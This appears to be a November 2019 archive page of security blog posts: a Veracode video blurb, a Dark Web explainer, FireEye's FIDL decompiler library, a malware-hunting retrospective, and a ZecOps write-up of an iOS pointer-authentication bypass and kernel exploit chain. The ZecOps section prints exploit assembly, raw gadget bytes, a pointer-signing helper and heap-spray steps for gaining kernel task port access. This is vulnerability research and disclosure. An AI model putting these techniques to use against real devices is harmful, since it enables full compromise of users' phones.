Monthly Archives: November 2019

[VIDEO] How Veracode Leverages AWS to Eliminate AppSec Flaws at Scale

Veracode's SaaS-native platform has scanned more than 10 trillion lines of code for security defects. That breaks down to more than 4 million applications, with 1 million of those scanned in the last year alone. By scanning in the Veracode platform, our customers benefit from the convenience of running programs, not systems, and developers free up much-needed processing power so they can continue writing code without any obstacles.

To deliver application security solutions with speed and accuracy at scale, Veracode needs massive computing power. Follow along as Veracode's EMEA CTO, Paul Farrington, explains how the Veracode platform leverages Amazon Web Services to solve some of the hardest problems facing organizations today: securing software in an ever-changing digital landscape.


The Dark Web: What You Need to Know

Despite its negative connotations, the Dark Web is nothing to be afraid of in itself. Few people know that it was originally conceived as a means of preserving privacy and security. However, that same design also enabled it to become a breeding ground for illegal activity.

There are certainly things to be distrustful of when navigating the Dark Web, and before venturing into it head-first, you should understand certain things about it.

What is the Dark Web?

The first thing you need to know is that there is no central database behind the Dark Web. Instead, content is served over peer-to-peer connections, which means that the data you are accessing is not stored in just one place.

Rather, it is spread across thousands of computers that are part of the network, so that no one can pinpoint where the information is coming from. You can upload to the network, but when downloading, there is no telling where the data originates.

Why do people use the Dark Web?

There are all kinds of uses for the Dark Web. Some of them are downright nefarious; others, not so much.

  • Drug sales

Given the anonymous nature of the Dark Web, it was only a matter of time before it came into use for selling illegal drugs; that built-in anonymity makes it an ideal avenue for this kind of transaction.

  • Illegal commerce

To say that you can buy anything on the Dark Web would be an understatement. Anything you can imagine, no matter how gruesome, can be purchased on the Dark Web, from guns to stolen data to organs.

  • Child porn

Is it really a surprise that child porn is rampant on the Dark Web? It's one of the darkest aspects of the network, but its anonymous nature does lend itself to concealing horrible realities like this.

  • Communication

For all its negative connotations and activities, the Dark Web can also be a way to foster open communication that can sometimes save lives or make a change. Especially in cases where governments monitor online activity, having a place to speak out freely can be invaluable.

  • Reporting

The Dark Web can be an excellent resource for journalists, because sources can remain anonymous. It also makes their activity far harder to trace, reducing the risk of consequences from authorities.

How to access

You may be wondering how you can access the Dark Web – after all, you can’t just Google it or access it in a regular browser.

Here are some of the aspects you need to keep in mind about accessibility, including the browser you need to use, the URLs, personal credentials you may need, and even acceptable currency, should you decide to make a purchase.

  • TOR browser

The most common way to access the Dark Web is via The Onion Router (TOR), the browser most people use for this purpose. TOR routes your traffic through multiple relays and wraps it in layers of encryption, concealing both your identity and your activity.

You can obtain the TOR browser by downloading it from the official website. It’s as easy as installing it and running it like any normal program. And if you were worried about the legality of it – have no fear.

Both accessing the Dark Web and downloading the means to do so are entirely legal. While this can enable some pretty dark human behavior, it can also give us very necessary freedom to do positive things, as you will see. Not everyone uses it for nefarious purposes.

  • Exact URLs

Something that makes the Dark Web difficult to navigate is that its pages are not indexed by search engines. Anything you may be looking for will require an exact URL. That limits both the number of people who can access the Dark Web and the scope of the pages any one person can reach.

Unless you know exactly where to look, you may not have much luck finding what you want. That can deter you from searching, or, on the contrary, it can push you to seek out someone well versed in illegal activity who can help you out.

  • Criminal activity

It comes as no surprise that the Dark Web is a hotbed of criminal activity. No one is advocating taking up criminal undertakings in order to use the Dark Web. But generally speaking, the people most likely to be looking for exact URLs here are people engaged in all manner of criminal activity.

  • Bitcoin

Most transactions on the Dark Web are completed in Bitcoin, as this type of currency is difficult (though not impossible) to trace. That increases the degree of safety of the transaction, both for buyers and for sellers.

However, that does not mean that these transactions are always safe. There is a high degree of uncertainty that accompanies these transactions, regardless of what you are purchasing.

You might find that the person you are buying from is a scammer who can end up taking your money, but not sending over your product. While identities are protected, transactions are not, so a degree of care is always necessary.

The future of the Dark Web

While authorities are always making efforts to cut down on the number of sites present on the Dark Web, more are always created. In the end, it proves to be a bit of a wasted effort. The more websites get shut down, the more pop up in their place.

Does that mean that the Dark Web will continue in perpetuity? No one can say with any degree of certainty. It is entirely possible that people will seek refuge in the anonymity of the Dark Web as the degree of surveillance grows, or the opposite can happen and we can grow to accept surveillance as a means of ensuring a thin veneer of security.

Conclusion

The Dark Web will always be controversial, but it’s not nearly as scary as it seems. It’s true that it certainly conceals some illegal and immoral behavior, but it can also be used for good. The anonymous and untraceable aspects of it help it remain a somewhat neutral space where one can find the freedom to communicate, investigate, search, trade, make purchases, etc.

 

 

The post The Dark Web: What You Need to Know appeared first on CyberDB.

FIDL: FLARE’s IDA Decompiler Library

IDA Pro and the Hex-Rays decompiler are a core part of any toolkit for reverse engineering and vulnerability research. In a previous blog post we discussed how the Hex-Rays API can be used to solve small, well-defined problems commonly seen as part of malware analysis. Having access to a higher-level representation of binary code makes the Hex-Rays decompiler a powerful tool for reverse engineering. However, interacting with the Hex-Rays API and its underlying data sources can be daunting, making the creation of generic analysis scripts difficult or tedious.

This blog post introduces the FLARE IDA Decompiler Library (FIDL), FireEye’s open source library which provides a wrapper layer around the Hex-Rays API.

Background

Output from the Hex-Rays decompiler is exposed to analysts via an Abstract Syntax Tree (AST). Out of the box, processing a binary using the Hex-Rays API means iterating this AST using a tree visitor class which visits each node in the tree and issues a callback.  For every callback we can check to see what kind of node we are visiting (calls, additions, assignments, etc.) and then process that node. For more information on these constructs see our previous blog post.
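The visitor workflow is easy to picture with a generic analogue. The sketch below is plain Python, not the actual Hex-Rays API; the node kinds and class names are illustrative, but the shape matches the pattern described above: one callback fires per node, and the callback must inspect the node kind to decide what to do.

```python
# A generic analogue of the Hex-Rays tree-visitor workflow (illustrative,
# not the real IDA API): each node in a small expression tree triggers a
# callback, and the callback checks the node kind before acting.

class Node:
    def __init__(self, kind, children=(), value=None):
        self.kind = kind          # e.g. "call", "add", "asg", "num"
        self.children = list(children)
        self.value = value

class TreeVisitor:
    """Walks the AST depth-first, issuing a callback for every node."""
    def __init__(self, callback):
        self.callback = callback

    def visit(self, node):
        self.callback(node)
        for child in node.children:
            self.visit(child)

# AST for: result = helper(1 + 2)
ast = Node("asg", [
    Node("var", value="result"),
    Node("call", [Node("add", [Node("num", value=1),
                               Node("num", value=2)])],
         value="helper"),
])

calls = []
TreeVisitor(lambda n: n.kind == "call" and calls.append(n.value)).visit(ast)
print(calls)  # -> ['helper']
```

In the real API, a `ctree_visitor_t` subclass and its `visit_expr` callback play the role of `TreeVisitor` above, with node kinds exposed as `cot_*` constants.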

The Problem

While powerful, this workflow can be difficult to use when creating a generic API for several reasons:

  • The order nodes are visited in is not always obvious from the decompiler output
  • When visiting a node, we have no context about where we are in the AST
  • Any problem which requires multiple steps requires multiple visitors or complicated logic in our callback function
  • The amount of cases to handle when walking up or down the AST can increase exponentially

Handling each of these cases in a single visitor callback function is untenable, so we need a way to more flexibly interact with the decompiler.

FIDL

FIDL, the FLARE IDA Decompiler Library, is our implementation of a wrapper around the Hex-Rays API. FIDL’s main goal is to abstract away the lower level details of the default decompiler API. FIDL solves multiple problems:

  • Provides analysts an easy-to-understand API layer which can be used to write more complicated binary processing scripts
  • Abstracts away the minutiae of processing the AST
  • Provides helper implementations for commonly needed functionality when working with the decompiler
  • Provides documented examples on how to use various Hex-Rays APIs

Many of FIDL’s benefits are exposed to users via the controlFlowinator class. When constructing this object, FIDL parses the AST for us and provides a high-level summary of a function using information extracted via the decompiler, including APIs called, their parameters, and a summary of the function's local variables and parameters.

Figure 1 shows a subset of information available via a controlFlowinator next to the decompilation of the function.


Figure 1: Sample output available as part of a controlFlowinator

When parsing the AST during construction, the controlFlowinator also combines nodes representing the same logical expression into a more digestible form where each block translates roughly to one line of pseudocode. Figure 2 and Figure 3 show the AST and controlFlowinator representations of the same function.


Figure 2: The default rendering of the AST of a function


Figure 3: The control flow graph created by the controlFlowinator for the function shown in Figure 2

Compared to the default AST, this graph is organized by potential code paths that can be taken through a function. This gives analysts a much more logical structure to iterate when trying to determine context for a particular expression.

Readily available access to variables and API calls used in a function makes creating scripts that leverage the Hex-Rays API much more straightforward. In our previous blog post we introduced a script which uses the Hex-Rays API to rename global variables based on the parameter to GetProcAddress. Figure 4 shows this script rewritten using the FIDL API. The new script is both easier to understand and does not rely on manually walking the AST.


Figure 4: Script that uses the FIDL API to map all calls to GetProcAddress to global variables

Rather than calling GetProcAddress, malware commonly resolves needed imports manually by walking the Export Address Table (EAT) and comparing the hashes of a DLL’s export names against pre-computed values. For an analyst, being able to quickly or automatically map these functions to their intended APIs makes it easier to decide which functions are worth analyzing. Figure 5 shows an example of how FIDL can be used to handle these cases. This script targets a DRIDEX sample with MD5 hash 7B82CF2CF9D08191C6828C3F62A2F914. This binary uses CRC32 with an XOR key of 0x65C54023 as the hashing algorithm during import resolution.


Figure 5: IDAPython script to automatically process and markup a DRIDEX sample

Running the above script results in output similar to what is shown in Figure 6, with comments labeling which functions are resolved.


Figure 6: The script in Figure 5 inserts comments into the decompiler output annotating decrypted strings
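The hashing scheme used by this sample is easy to reproduce outside of IDA. A minimal sketch follows: the XOR key 0x65C54023 comes from the sample described above, while the export names and the `wanted` value are illustrative stand-ins for a real DLL's export table and a hash recovered from the binary.

```python
import zlib

XOR_KEY = 0x65C54023  # hashing key used by the DRIDEX sample discussed above

def api_hash(name: bytes) -> int:
    """CRC32 of the export name, XORed with the sample's key."""
    return (zlib.crc32(name) & 0xFFFFFFFF) ^ XOR_KEY

# Build a lookup table from a DLL's export names, then map pre-computed
# hashes found in the binary back to API names.
exports = [b"LoadLibraryA", b"GetProcAddress", b"VirtualAlloc"]
lookup = {api_hash(n): n.decode() for n in exports}

wanted = api_hash(b"VirtualAlloc")   # stand-in for a hash read from the binary
print(lookup.get(wanted))            # -> VirtualAlloc
```

A script like the one in Figure 5 does essentially this, except that the hashes come from call sites found via the decompiler and the matches are written back as comments.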

You can find FIDL in the FireEye GitHub repository.

Conclusion

While the Hex-Rays decompiler is a powerful source of information during reverse engineering, writing generic scripts and plugins using the default API is difficult and requires handling numerous edge cases. This post introduced the FIDL library, a wrapper around the Hex-Rays API, which fixes this by reducing the amount of low-level details an analyst needs to understand in order to create a script leveraging the decompiler and should make the creation of these scripts much faster. In future blog posts we will publish more scripts and analysis utilizing this library.

After 1 Million Analyzed Samples

One year ago I decided to invest in static malware analysis automation by setting up a full-stack environment able to grab samples from common open sources and process them using Yara rules. My main goal was to offer the cybersecurity community a public dataset of pre-processed analyses and make it searchable, by offering a public API (PAPI) and a simple visualization UI available HERE. Today, one year later, it is time to check how the project has grown and review its running balance.

How it works

Malware Hunter is a Python-powered project driven by three main components: collectors, processors, and a public API. The collectors take samples from publicly available sources and place them in a local queue, where they wait to be processed. The processors are multiple single Python processes running in a distributed environment; they pull samples from the common queue, process them, and save the whole result set back to a MongoDB instance. Unfortunately I cannot store all the analyzed samples, since the storage cost would rise quite quickly, so I mainly keep only the "reports": i.e. what the processor has analyzed. The public API (if you want access to it, please write me) is used to query MongoDB and to submit new samples. Finally, a simple user interface provides some statistics over time.

A periodic task looks for matches on specific Yara rules associated with APTs and populates a dedicated view, available HERE. In other words, if it finds a match on a well-known Yara rule built to catch Advanced Persistent Threats, it records the calculated hash and, through a dedicated API, visualizes stats and matching signatures for all potential APTs found.

Everything runs without human interaction, which is both good and bad. It is good because the system can scale up very quickly (depending on the power acquired on the VPS); on the other hand, with no human in the loop, and depending on how the Yara rules are implemented, the system can produce many false positives. BUT what interests me is having a base set of samples to start from. Without such a tool, how would you start hunting for specific threats? With it, I can start from the samples that matched the signature related to the specific threat I want to follow, rather than starting at random.
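The collector/queue/processor pipeline described above can be sketched in a few lines. This is a conceptual model, not the project's real code: the names, the in-memory queue, and the trivial byte-pattern "rules" standing in for compiled Yara rules are all illustrative, and the `reports` dict stands in for the MongoDB collection.

```python
import queue

sample_queue = queue.Queue()
reports = {}  # stand-in for the MongoDB "reports" collection

# Trivial stand-ins for compiled Yara rules: (rule_name, byte pattern)
YARA_RULES = [("Embedded_PE", b"MZ"), ("HTTP", b"http://")]

def collector(samples):
    """Grab samples from a source and enqueue them for processing."""
    for sha256, payload in samples:
        sample_queue.put((sha256, payload))

def processor():
    """Pull samples off the common queue, scan them, and keep only the report."""
    while not sample_queue.empty():
        sha256, payload = sample_queue.get()
        matches = [name for name, pattern in YARA_RULES if pattern in payload]
        reports[sha256] = {"matches": matches, "size": len(payload)}
        sample_queue.task_done()

collector([("aa11", b"MZ\x90\x00..."), ("bb22", b"GET http://example")])
processor()
print(reports["bb22"]["matches"])  # -> ['HTTP']
```

In the real system, multiple processor instances run on separate machines against a shared queue, and only the report documents are persisted, which is what keeps the storage cost under control.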

Findings

After almost one year of fully automated static analysis through Yara rules, Malware Hunter has analyzed more than one million samples, distributed in the following way.

Malware Analyses Distribution

It looks like in April 2019 the engine extracted and analyzed a small set of samples compared to the general trend, while in late August / early September it analyzed more than 250k samples. It is interesting to see a significant increase in analyses at the end of the year compared to the beginning of the same year. Since the collectors have drawn from the same sources over the past year, and the engine analyzes only specific file types (for example, PE and Office files), then assuming the sample sources had no outages, this can mean that:

  • More out-of-scope samples (for example HTML, JavaScript, VBA, etc.) were spread in the April-to-June time frame, or
  • Malware flow is subject to cyclical trends that depend on multiple factors, including political influences and fiscal years.

Looking at the most frequently matched Yara rules, it is no surprise that the most analyzed samples were executable files. Many of them (almost 400k) hid a PE file, compressed and/or encrypted, inside themselves.
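The idea behind a rule like Embedded_PE can be sketched in a few lines: look for an "MZ" header whose e_lfanew field points at a valid "PE\0\0" signature. This is a simplified stand-in for a real Yara rule, and it would only catch payloads that are not encrypted; the sample blob below is synthetic.

```python
import struct

def find_embedded_pe(blob: bytes):
    """Return offsets of plausible embedded PE files: an 'MZ' header whose
    e_lfanew field (at offset 0x3C) points at a 'PE\\0\\0' signature."""
    hits = []
    pos = blob.find(b"MZ")
    while pos != -1:
        if pos + 0x40 <= len(blob):
            (e_lfanew,) = struct.unpack_from("<I", blob, pos + 0x3C)
            pe_off = pos + e_lfanew
            if blob[pe_off:pe_off + 4] == b"PE\x00\x00":
                hits.append(pos)
        pos = blob.find(b"MZ", pos + 1)
    return hits

# A dropper-like blob with a fake PE at offset 8: a DOS header padded to
# 0x40 bytes, e_lfanew set to 0x40, then the 'PE\0\0' signature.
inner = bytearray(b"MZ" + b"\x00" * 0x3E)
struct.pack_into("<I", inner, 0x3C, 0x40)
inner += b"PE\x00\x00"
blob = b"JUNKJUNK" + bytes(inner)
print(find_embedded_pe(blob))  # -> [8]
```

Real rules add more validation (section table sanity, file size checks) to keep false positives down, but the core heuristic is the same.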

TOP Matched Rules

Many Yara matches highlight a heavy presence of anti-debugging techniques, for example DebuggerTiming_Ticks, DebuggerPatterns_SEH_Inits, Debugger_Checks, isDebuggerPresent, and so on. Considered together with Create_Process, Embedded_PE and Win_File_Operations, they lead the analyst to think that modern malware is heavily obfuscated and weaponized against debuggers. From signatures such as keyloggers and screenshots, it is clear that much of today's malware records our keyboard activity and spies on us by taking periodic screenshots. The presence of HTTP and TCP rules underlines how new malware keeps going online, either to download shellcode (the shellcode signature) or to take orders from a C2 system (such as a server). Many samples appear to open a local communication port, which often hides a local proxy used to encrypt communication between the malware and its command and control. Crafted mutexes are also very common among malware developers; they are used to delay execution or to manage multiple-infection scenarios.

Equation Group Signature Matches

Another interesting observation comes from the way the Equation Group toolset matches.

The Equation Group, classified as an advanced persistent threat, is a highly sophisticated threat actor suspected of being tied to the Tailored Access Operations (TAO) unit of the United States National Security Agency (NSA). Kaspersky Labs describes them as one of the most sophisticated cyber attack groups in the world and “the most advanced … we have seen”, operating alongside, but always from a position of superiority, the creators of Stuxnet and Flame.

From Wikipedia

Many EquationGroup_toolset signatures matched during the most active detection time frames (at the beginning and at the end of the year), a reminder that those well-known tools are still up and running and heavily reused across samples. The Shadow Brokers released the code in August 2016, and since then many pieces of malware have adopted it; it still appears to be current in many executable samples.

From the slow but interesting “potential APT detection” page (available HERE) we have “live” stats (updated every 24h) on APT matches over the one million analyzed samples. Dragonfly (also known as Energetic Bear) is what Malware Hunter matched most often. According to Malpedia, Dragonfly is a Russian group that collects intelligence on the energy industry. It is followed by Regin: according to Kaspersky Lab’s findings, the Regin APT campaign targets telecom operators, government institutions, multi-national political bodies, financial and research institutions, and individuals involved in advanced mathematics and cryptography. The attackers seem to be primarily interested in gathering intelligence and facilitating other types of attacks.

Most APT Signature Matches

Many Ursnif/Gozi samples were detected during the past year. Ursnif/Gozi is a rather (in)famous banking trojan, mostly targeting the UK and Italy, that Trend Micro attributed to the cybercrime group TA-505 in late 2018 after spotting common evidence linking Ursnif/Gozi to TA-505 banking trojans such as Dridex and the loader Emotet. It is also interesting to note that some quite old rules related to Putter Panda hit on a few samples (for example: 1b1c4bc8d5f32b429eac590ec94b1a0780eaf863db99674decb6b6bd9abdf979 and ef046640438ab22d0168017aa75f7137f7a94e30e9f2f16cd65596d0a95a75d2, ...). Putter Panda is a Chinese threat group that has been attributed to Unit 61486 of the 12th Bureau of the PLA’s 3rd General Staff Department (GSD). The analysis of these results could go further; if you are interested in the details, please do not hesitate to contact me, or use the search field on that page.

Used Infrastructure

While the scrapers and the workers run on remote and domestic PCs, the PAPI server holds both the Public Application Program Interface and the search scripts (the ones used to match and alert on specific API matches). The following graphs show the VPS usage at a glance.

Server Usage

The 4 CPUs sit at 100% most of the time. They are used to process Yara rules, to build up database views, to filter out unwanted samples (for example HTML, JavaScript and so on), to search and alert on interesting samples, and to periodically enrich pre-calculated reports with additional information over time. The disk is mostly used to store temporary files in separate queues before processing; the MongoDB instance is not hosted on the same machine. The network graph tracks the balance between bytes sent and bytes received. Roughly 2.0 Mbps inbound is the sustained lower-bound rate, while 300 Kbps is the average outbound. This means the collectors are grabbing a good number of new samples per day from publicly available sources and pushing them onto the central queue. The PAPI traffic, on the other hand, accounts for a lower outbound rate, which makes sense: the PAPI JSON result for a single request is far lighter than the sample it describes.
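The inbound figure translates into a sizeable daily volume; a quick back-of-the-envelope check, using the rates read from the graph above (megabit = 10^6 bits):

```python
# Convert the graph's average network rates into daily transfer volumes.
SECONDS_PER_DAY = 86_400

def mbps_to_gb_per_day(mbps: float) -> float:
    """Megabits per second -> gigabytes transferred per day."""
    return mbps * 1e6 / 8 * SECONDS_PER_DAY / 1e9

print(round(mbps_to_gb_per_day(2.0), 1))   # inbound:  ~21.6 GB/day
print(round(mbps_to_gb_per_day(0.3), 1))   # outbound: ~3.2 GB/day
```

So a sustained 2.0 Mbps inbound stream amounts to roughly 20 GB of fresh sample data per day flowing into the queue.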

I hope you enjoy the tool. As usual, feel free to search the samples, use them to classify your TI, and if you need PAPI access, let me know. I am planning to keep it running as long as the cost does not grow too much for me.

ZecOps Task-For-Pwn 0 Bounty: TFP0 POC on PAC-Enabled iOS Devices

Summary

In September we announced “Task For Pwn 0 (TFP0): Operation #FreeTheSandbox”. In this blog post we are delighted to announce that we have successfully obtained TFP0 on both non-PAC and PAC devices. We are now releasing TFP0 POC code for PAC-enabled devices to empower users to independently verify the integrity of their own devices.

Since the release of checkm8, users can independently verify device integrity on non-PAC devices. However, owners of PAC-enabled devices are still restricted by the iOS sandbox, which inhibits full analysis of their own devices.

Presently, only PAC-enabled iOS devices cannot be inspected, hence we are no longer offering bounties for non-PAC devices. At the same time, we have extended additional bounties to Boot ROM vulnerabilities and generic Local Privilege Escalations (LPEs) for Android devices, ideally boot-level LPEs. You can read more about our updated bounties for iOS (A12/A13) and Android in the following blog post: Checkm8 Implications on iOS DFIR, TFP0, #FreeTheSandbox, Apple, and Google

Technical Summary

This blog provides an overview of an exploitation technique to bypass Pointer Authentication Codes (PAC), which were introduced on all iOS devices starting with the A12. It focuses on CVE-2019-8797, CVE-2019-8795 and CVE-2019-8794. The remainder of this report provides additional details about the PAC bypass on iOS <= 12.4.2.

For more information about the vulnerability, which can be triggered and exploited on iOS devices without PAC, please refer to this article. We would like to thank 08Tc3wBB for this submission.

Bounty: For this exploit chain, covering both PAC and non-PAC devices, we provided $35,000 in bounties.

Userspace Exploit

The published exploit describes how to achieve sandbox escape by exploiting CVE-2019-8797 of MIDIServer.

The following is the disassembly of MIDIIORingBufferWriter::EmptySecondaryQueue on non-PAC devices. By exploiting CVE-2019-8797, the published exploit is able to hijack the PC register by controlling the value of x8 in the highlighted line.

bool MIDIIORingBufferWriter::EmptySecondaryQueue(MIDIIORingBufferWriter *this) 
                stp         	x28, x27, [sp,#-0x10+var_50]!
                stp         	x26, x25, [sp,#0x50+var_40]
                stp         	x24, x23, [sp,#0x50+var_30]
                stp         	x22, x21, [sp,#0x50+var_20]
                stp         	x20, x19, [sp,#0x50+var_10]
                stp         	x29, x30, [sp,#0x50+var_s0]
                add         	x29, sp, #0x50
                mov         	x21, x0
                mov         	x19, x0 
                ldr         	x8, [x19,#0x58]!
                ldr         	x8, [x8,#0x10]
                mov         	x0, x19
                blr         	x8 // PC control

However, on the devices with PAC, the instruction “ldraa” loads pointer with pointer authentication, which means that we need to pass an address with proper authentication to x8.

bool MIDIIORingBufferWriter::EmptySecondaryQueue(MIDIIORingBufferWriter *this)
	         pacibsp
	         sub	sp, sp, #0x70
	         stp	x28, x27, [sp, #0x10]
	         stp	x26, x25, [sp, #0x20]
	         stp	x24, x23, [sp, #0x30]
	         stp	x22, x21, [sp, #0x40]
	         stp	x20, x19, [sp, #0x50]
	         stp	x29, x30, [sp, #0x60]
	         add	x29, sp, #0x60
	         mov	x19, x0 
	         add	x0, x0, #0x58    
	         str	x0, [sp]
	         ldr	x8, [x19, #0x58] // <-- x8 point to a controlled memory, with A-key encrypted
	         ldraa	x9, [x8, #0x10]! 
	         movk	x8, #0x165d, lsl #48
	         blraa	x9, x8 // PC control

Trying ROP without stripping the PAC pointer, triggers the following crash on the target process:

Exception Type:  EXC_BAD_ACCESS (SIGSEGV)
Exception Subtype: KERN_INVALID_ADDRESS at 0x002000029f000010 -> 0x000000029f000010 (possible pointer authentication failure)
VM Region Info: 0x29f000010 is in 0x280000000-0x2a0000000;  bytes after start: 520093712  bytes before end: 16777199
      REGION TYPE                      START - END             [ VSIZE] PRT/MAX SHRMOD  REGION DETAIL
      unused shlib __TEXT    00000001dd1f8000-00000001dd998000 [ 7808K] r--/r-- SM=COW  ... this process
      GAP OF 0xa2668000 BYTES
--->  MALLOC_NANO            0000000280000000-00000002a0000000 [512.0M] rw-/rwx SM=PRV  
      UNUSED SPACE AT END

This concept of PAC bypassing is derived from Ian Beer’s post. Let’s take a look at the document to see how “ldraa” works:

Load Register, with pointer authentication. This instruction authenticates an address from a base register using a modifier of zero and the specified key, adds an immediate offset to the authenticated address, and loads a 64-bit doubleword from memory at this resulting address into a register.

Key A is used for LDRAA, and key B is used for LDRAB.

Since the instruction “ldraa” uses the A-family keys which are shared between all processes, we are able to authenticate the addresses we have controlled using pac* instructions. The example below demonstrates how we can use the “pacdza” instruction to authenticate a data pointer that will pass the “ldraa”.

uint64_t PACSupport_pacdza(uint64_t data_ptr){
    // Sign data_ptr with the A data key and a zero modifier, so that the
    // resulting pointer passes the authenticated load done by "ldraa".
    __asm__ __volatile__(
                         "mov    x8, %0\n"
                         "pacdza x8\n"
                         "mov    %0, x8\n"
                         : "+r"(data_ptr)
                         :
                         : "x8");
    return data_ptr;
}

After gaining initial PC control, we still need to control other registers for arbitrary code execution. At this point, x0 contains a pointer to memory we control, which is also A-key encrypted.

When the targeted pointer is encrypted, normal load instructions like “ldr” and “ldp” will trigger a crash.

Now we need to strip the pointer authentication from those registers. The following gadgets are used to strip the registers we need:

Gadget_doubleJump:
    0x08, 0x00, 0x40, 0xF9, // ldr    x8, [x0]
    0x09, 0x3D, 0x20, 0xF8, // ldraa  x9, [x8, #0x18]!
    0x48, 0x15, 0xEE, 0xF2, // movk   x8, #0x70aa, lsl #48
    0x28, 0x09, 0x3F, 0xD7, // blraa  x9, x8      // Jmp to Gadget_strip_x0
    0x08, 0x00, 0x40, 0xF9, // ldr    x8, [x0]    // Now x0 is fully under control
    0xE8, 0x3B, 0xC1, 0xDA, // autdza x8
    0x09, 0x01, 0x40, 0xF9, // ldr    x9, [x8]
    0xA8, 0x39, 0xFF, 0xF2, // movk   x8, #0xf9cd, lsl #48
    0x28, 0x09, 0x3F, 0xD7, // blraa  x9, x8

Gadget_strip_x0:
    0x00,0x00,0x40,0xF9, // ldr x0, [x0]   // Reset x0, now point to memory under our control
    0xE0,0x47,0xC1,0xDA, // xpacd  x0      // Remove PAC from it
    0xC0,0x03,0x5F,0xD6, // ret

Gadget_control_x0x2:
    0xF3, 0x03, 0x00, 0xAA, // mov    x19, x0
    0x08, 0x00, 0x42, 0xA9, // ldp    x8, x0, [x0, #0x20]
    0x61, 0x3A, 0x40, 0xB9, // ldr    w1, [x19, #0x38]
    0x62, 0x1A, 0x40, 0xF9, // ldr    x2, [x19, #0x30]
    0x1F, 0x09, 0x3F, 0xD6, // blraaz x8

After controlling PC, x0 and x2, we are able to call xpc_array_apply_f with x0 pointing to a crafted fake xpc array. The function pointer is then called in a loop, each time with a controllable x2 register:

By pointing the function pointer to IODispatchCalloutFromMessage and making each element of the fake xpc_array to point to a fake mach message matching the format expected by IODispatchCalloutFromMessage, it is possible to chain together an arbitrary number of basic function calls.

There are limitations compared to regular ROP, however this is sufficient to achieve the goal including opening up a kernel surface to proceed to kernel exploit.

Kernel Exploit

Kernel PAC does not affect the information disclosure bug, hence KASLR can be bypassed. 

In the published exploit, the PC is controlled by hijacking a vtable at the line marked with comment (a). Since we are not able to use JOP due to PAC, we need another primitive to bypass it.

Let’s take a look at the AppleAVE2Driver::DeleteMemoryInfo function from another angle, emphasising that we have full control of *memInfo.

__int64 AppleAVE2Driver::DeleteMemoryInfo(AppleAVE2Driver *this, IOSurfaceBufferMngr **memInfo)
{
  [...]
 
  if ( memInfo )
  {
    if ( *memInfo )
    {
      v8 = destroy_iosurfaceinfo_buf(*memInfo); //(a) Hijack PC
      operator delete(v8);  // (b) Potentially leads to arbitrary memory release
    }
    memset(memInfo, 0, 0x28uLL);
    result = 0LL;
  }
 [...]
  return result;
}

__int64 __fastcall destroy_iosurfaceinfo_buf(__int64 a1)
{
  __int64 this; // x19

  this = a1;
  remove_buffer(a1);
  return this;
}

The following is the code called by destroy_iosurfaceinfo_buf. We can avoid triggering code execution by setting the values at some of the offsets (e.g. 0x28, 0x30 and 0x20) to 0, in order to control the pointer passed to “operator delete” (see comment (b)). In this way, we turn the vulnerability into another powerful primitive: arbitrary memory release.

__int64 __fastcall remove_buffer(__int64 a1)
{
  __int64 v1; // x19
  __int64 v2; // x2
  __int64 v3; // x0
  __int64 v4; // x0
  __int64 result; // x0
  __int64 v6; // x1
  __int64 v7; // x1

  v1 = a1;
  sub_FFFFFFF00691D958();
  if ( *(_QWORD *)(v1 + 0x28) && *(_QWORD *)(v1 + 0x68) && *(_QWORD *)(v1 + 0x50) ) //bypass
  {
    v2 = *(_QWORD *)(v1 + 0x48);
    sub_FFFFFFF006922108();
  }
  v3 = *(_QWORD *)(v1 + 0x30);
  if ( v3 ) //bypass
  {
    (*(void (**)(void))(*(_QWORD *)v3 + 0x28LL))();
    *(_QWORD *)(v1 + 0x30) = 0LL;
  }
  v4 = *(_QWORD *)(v1 + 0x28);
  if ( v4 ) //bypass
  {
    (*(void (**)(void))(*(_QWORD *)v4 + 0xD8LL))();
    (*(void (**)(void))(**(_QWORD **)(v1 + 40) + 40LL))();
    *(_QWORD *)(v1 + 40) = 0LL;
  }
  result = *(_QWORD *)(v1 + 0x20);
  if ( result ) //bypass
  {
   [...]
  }
  return result;
}

With this primitive, we can now use the strategy introduced at Black Hat USA 2019 by Tielei Wang and Hao Xu.

1. Spray OSData objects the size of a page (0x4000). After spraying a large volume of OSData, it is not hard to predict the address of one of them. The predicted_address allows us to construct OSData containing a fake ipc_port struct and task struct, used to leak the addresses of kernel_map and ipc_space_kernel in the following steps.

Note that OSData uses kmem_alloc instead of kmem_alloc_kobject when the requested size is greater than or equal to page_size (0x4000), and kmem_alloc allocates data outside of kernel_object. We therefore need to shrink spray_data_len to 0x3FFF.

+----------+----------+----------+----------+----------+
|  OSDATA  |  OSDATA  |  OSDATA  |  OSDATA  |  OSDATA  |
+----------+----------+----------+----------+----------+

2. Trigger the vulnerability to release the OSData at predicted_address.

+----------+----------+----------+----------+----------+
|  OSDATA  |  OSDATA  |  FREE    |  OSDATA  |  OSDATA  |
+----------+----------+----------+----------+----------+

3. Send an ool_ports descriptor of the same size as the freed OSData to ourselves, to fill up that hole.

                     +-------------+
                     | ool_ports   |
                     +------+------+
                            |
                            |
+----------+----------+-----v----+----------+----------+
|  OSDATA  |  OSDATA  | MACH_MSG |  OSDATA  |  OSDATA  |
+----------+----------+----------+----------+----------+

4. Release the filled data using IOSurface, so that the memory holding the ool_ports is released.

                     +-------------+
                     | ool_ports   |
                     +------+------+
                            |
                            |
+----------+----------+-----v----+----------+----------+
|  OSDATA  |  OSDATA  |   FREE   |  OSDATA  |  OSDATA  |
+----------+----------+----------+----------+----------+

5. Re-spray OSData that contains fake IPC objects to gain control of the ipc_port structure.

Please note that at this point we still cannot build a fake TFP0 port, because we do not yet know the addresses of kernel_map and ipc_space_kernel.

                     +-------------+
                     | ool_ports   |
                     +------+------+
                            |
                            |
+----------+----------+-----v----+----------+----------+
|  OSDATA  |  OSDATA  |FAKE PORTS|  OSDATA  |  OSDATA  |
+----------+----------+----------+----------+----------+

6. Receive these ports, which are translated from the in-kernel ipc_port structures we took control of in the previous step. Next, the fake ipc_port_struct and task_struct sprayed in step 1 are used to leak kernel information: with these fake ports, we can read values from kernel memory via pid_for_task.

Now we have all the addresses required to build a fake TFP0 port.

7. Release and re-spray OSData that contains a fake TFP0 port, while the ool_ports pointer is still pointing to the fake ipc_port_struct. TFP0 achieved!

                     +-------------+
                     | ool_ports   |
                     +------+------+
                            |
                            |
+----------+----------+-----v----+----------+----------+
|FAKE TFP0 |FAKE TFP0 |FAKE TFP0 |FAKE TFP0 |FAKE TFP0 |
+----------+----------+----------+----------+----------+
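
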